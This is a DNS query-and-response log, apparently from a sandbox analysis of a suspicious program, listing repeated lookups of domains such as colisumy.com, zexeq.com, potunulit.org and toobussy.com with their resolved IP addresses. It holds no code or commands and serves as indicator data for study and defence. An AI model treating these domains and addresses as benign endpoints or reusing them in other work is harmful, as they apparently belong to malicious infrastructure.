                                                                                                                            May 28, 2023 10:43:25.135301113 CEST192.168.2.38.8.8.80x5cc3Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.377245903 CEST192.168.2.38.8.8.80x36acStandard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:28.015558004 CEST192.168.2.38.8.8.80xbebfStandard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:29.523540020 CEST192.168.2.38.8.8.80xf4f1Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.456631899 CEST192.168.2.38.8.8.80x7fStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:30.880661011 CEST192.168.2.38.8.8.80x89c9Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.084322929 CEST192.168.2.38.8.8.80xc813Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:31.538268089 CEST192.168.2.38.8.8.80xea73Standard query (0)adsmanager.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.162396908 CEST192.168.2.38.8.8.80x72a9Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:32.421588898 CEST192.168.2.38.8.8.80x5905Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:33.629355907 CEST192.168.2.38.8.8.80x4431Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:34.475882053 CEST192.168.2.38.8.8.80x75e7Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:35.990720034 CEST192.168.2.38.8.8.80x64e9Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.213870049 CEST192.168.2.38.8.8.80x6cddStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:37.239511967 CEST192.168.2.38.8.8.80x5481Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:38.759414911 CEST192.168.2.38.8.8.80xa202Standard query (0)shsplatform.co.ukA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:39.408296108 CEST192.168.2.38.8.8.80xa76cStandard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:40.758038044 CEST192.168.2.38.8.8.80xcb14Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.292027950 CEST192.168.2.38.8.8.80xed1cStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:42.686049938 CEST192.168.2.38.8.8.80xd5a1Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:44.206152916 CEST192.168.2.38.8.8.80xba0aStandard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:45.733243942 CEST192.168.2.38.8.8.80x8d9dStandard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:46.970834017 CEST192.168.2.38.8.8.80xef30Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.335722923 CEST192.168.2.38.8.8.80xb441Standard query (0)adsmanager.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.361634970 CEST192.168.2.38.8.8.80x6476Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:47.854331970 CEST192.168.2.38.8.8.80xaa8dStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:48.617662907 CEST192.168.2.38.8.8.80xfe12Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.046684027 CEST192.168.2.38.8.8.80x6bb1Standard query (0)ss.apjeoighw.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:50.121634960 CEST192.168.2.38.8.8.80x2973Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:51.641613007 CEST192.168.2.38.8.8.80x2561Standard query (0)toobussy.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:52.415997028 CEST192.168.2.38.8.8.80xcfb6Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:57.150626898 CEST192.168.2.38.8.8.80xb748Standard query (0)adsmanager.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:57.771193981 CEST192.168.2.38.8.8.80x9b9bStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:59.824630022 CEST192.168.2.38.8.8.80xdec8Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:44:04.964651108 CEST192.168.2.38.8.8.80x92cbStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            May 28, 2023 10:42:32.616553068 CEST8.8.8.8192.168.2.30xc257No error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:32.616553068 CEST8.8.8.8192.168.2.30xc257No error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:33.222845078 CEST8.8.8.8192.168.2.30xf86aNo error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:38.075985909 CEST8.8.8.8192.168.2.30xd6e3No error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:38.075985909 CEST8.8.8.8192.168.2.30xd6e3No error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:38.384840012 CEST8.8.8.8192.168.2.30x3c92No error (0)speedlab.com.eg217.174.148.28A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:38.921091080 CEST8.8.8.8192.168.2.30xde50No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:39.366380930 CEST8.8.8.8192.168.2.30x243cNo error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:39.366380930 CEST8.8.8.8192.168.2.30x243cNo error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:43.096632004 CEST8.8.8.8192.168.2.30xb406No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:43.264162064 CEST8.8.8.8192.168.2.30x2ed4No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.728355885 CEST8.8.8.8192.168.2.30x8f29No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:44.919411898 CEST8.8.8.8192.168.2.30x77ceNo error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.156594038 CEST8.8.8.8192.168.2.30xe73No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.629652977 CEST8.8.8.8192.168.2.30x8189No error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:45.629652977 CEST8.8.8.8192.168.2.30x8189No error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:46.216006994 CEST8.8.8.8192.168.2.30xf47cNo error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:48.303133965 CEST8.8.8.8192.168.2.30xc85bNo error (0)jp.imgjeoighw.com103.100.211.218A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:51.658840895 CEST8.8.8.8192.168.2.30xe5cbNo error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:51.658840895 CEST8.8.8.8192.168.2.30xe5cbNo error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:54.770947933 CEST8.8.8.8192.168.2.30x5de4No error (0)speedlab.com.eg217.174.148.28A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:55.556116104 CEST8.8.8.8192.168.2.30x7a51No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:55.709743023 CEST8.8.8.8192.168.2.30x53d3No error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:55.709743023 CEST8.8.8.8192.168.2.30x53d3No error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:56.460953951 CEST8.8.8.8192.168.2.30xea1dNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.082051992 CEST8.8.8.8192.168.2.30x1becNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.233885050 CEST8.8.8.8192.168.2.30x510aNo error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.233885050 CEST8.8.8.8192.168.2.30x510aNo error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:58.691430092 CEST8.8.8.8192.168.2.30xe283No error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:42:59.602802038 CEST8.8.8.8192.168.2.30x96deNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:00.069217920 CEST8.8.8.8192.168.2.30xe540No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:00.545985937 CEST8.8.8.8192.168.2.30x54a7No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:01.159085035 CEST8.8.8.8192.168.2.30x113fNo error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:02.224514008 CEST8.8.8.8192.168.2.30xd66dNo error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:02.224514008 CEST8.8.8.8192.168.2.30xd66dNo error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:02.961893082 CEST8.8.8.8192.168.2.30x92d5No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.462907076 CEST8.8.8.8192.168.2.30x101bNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.689167976 CEST8.8.8.8192.168.2.30xe0No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.832632065 CEST8.8.8.8192.168.2.30x8f41No error (0)speedlab.com.eg217.174.148.28A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:03.839757919 CEST8.8.8.8192.168.2.30xb3c7No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:04.308897972 CEST8.8.8.8192.168.2.30x1e46No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:04.599715948 CEST8.8.8.8192.168.2.30x85fbNo error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:04.599715948 CEST8.8.8.8192.168.2.30x85fbNo error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:06.382241964 CEST8.8.8.8192.168.2.30x31d6No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.126195908 CEST8.8.8.8192.168.2.30x3334No error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.126195908 CEST8.8.8.8192.168.2.30x3334No error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.356868029 CEST8.8.8.8192.168.2.30x2d2aNo error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.364994049 CEST8.8.8.8192.168.2.30x2e88No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.617041111 CEST8.8.8.8192.168.2.30x46dfNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.797144890 CEST8.8.8.8192.168.2.30xa3e4No error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.876914978 CEST8.8.8.8192.168.2.30x608bNo error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
